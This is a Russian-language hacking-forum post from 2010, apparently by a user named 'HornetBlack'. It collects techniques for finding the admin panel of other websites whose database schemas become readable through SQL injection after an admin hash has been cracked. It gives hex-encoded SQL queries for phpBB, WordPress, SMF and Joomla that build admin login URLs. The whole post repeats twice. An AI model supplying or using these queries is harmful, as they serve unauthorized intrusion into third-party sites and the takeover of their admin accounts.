HornetBlack
13.09.2010, 21:19
Занимаясь наполнением своего зверька MWG (http://mwgrasp.oni.cc/) полезной инфой, столкнулся с темой, которая практически нигде еще не освещалась.
Работая с SQL-инжектами довольно часто натыкаешься на сайты, запущенные под юзером с большими привилегиями, а значит в БД доступны для просмотра десятки табличных схем, относящихся к разным сайтам. После декодирования хэша админа из таблицы какой-нибудь схемы возникает вопрос - как найти админку или хотя бы сайт, к которому относится данная схема? Хотелось бы в этом топике собрать методы поиска путей к таким админкам и сайтам, а также готовые решения для известных форумов и CMS.
Одним из способов найти искомый путь является поиск подсказок в самой БД. Для некоторых форумов и цмс-ок этот метод наиболее прост. Например, для форума phpBB следующий запрос вернет путь к админке:
SELECT group_concat(config_value ORDER BY config_name DESC SEPARATOR 0x2F) FROM phpbb_config WHERE config_name=0x7365727665725F6E616D65 OR config_name=0x7363726970745F70617468
Для Wordpress:
SELECT concat(option_value,0x2F77702D6C6F67696E2E706870) FROM wp_options WHERE option_name LIKE 0x7369746575726C
Для SMF:
SELECT replace(value,0x2F536D696C657973,0x2F696E6465782E7 068703F616374696F6E3D6C6F67696E32) FROM smf_settings WHERE variable=0x736D696C6579735F75726C
А вот у Joomla я обнаружил только абсолютный путь к сайту, который все же иногда помогает найти урл сайта:
SELECT substring_index(substring_index(substr(data,instr( data,0x50617468)),0x22,3),0x22,-1)
Более сложным вариантом нахождения нужных сайтов является прогон строк контента из БД в поисковиках. Есть ли еще идеи?
Работая с SQL-инжектами довольно часто натыкаешься на сайты, запущенные под юзером с большими привилегиями, а значит в БД доступны для просмотра десятки табличных схем, относящихся к разным сайтам. После декодирования хэша админа из таблицы какой-нибудь схемы возникает вопрос - как найти админку или хотя бы сайт, к которому относится данная схема? Хотелось бы в этом топике собрать методы поиска путей к таким админкам и сайтам, а также готовые решения для известных форумов и CMS.
Одним из способов найти искомый путь является поиск подсказок в самой БД. Для некоторых форумов и цмс-ок этот метод наиболее прост. Например, для форума phpBB следующий запрос вернет путь к админке:
SELECT group_concat(config_value ORDER BY config_name DESC SEPARATOR 0x2F) FROM phpbb_config WHERE config_name=0x7365727665725F6E616D65 OR config_name=0x7363726970745F70617468
Для Wordpress:
SELECT concat(option_value,0x2F77702D6C6F67696E2E706870) FROM wp_options WHERE option_name LIKE 0x7369746575726C
Для SMF:
SELECT replace(value,0x2F536D696C657973,0x2F696E6465782E7 068703F616374696F6E3D6C6F67696E32) FROM smf_settings WHERE variable=0x736D696C6579735F75726C
А вот у Joomla я обнаружил только абсолютный путь к сайту, который все же иногда помогает найти урл сайта:
SELECT substring_index(substring_index(substr(data,instr( data,0x50617468)),0x22,3),0x22,-1)
Более сложным вариантом нахождения нужных сайтов является прогон строк контента из БД в поисковиках. Есть ли еще идеи?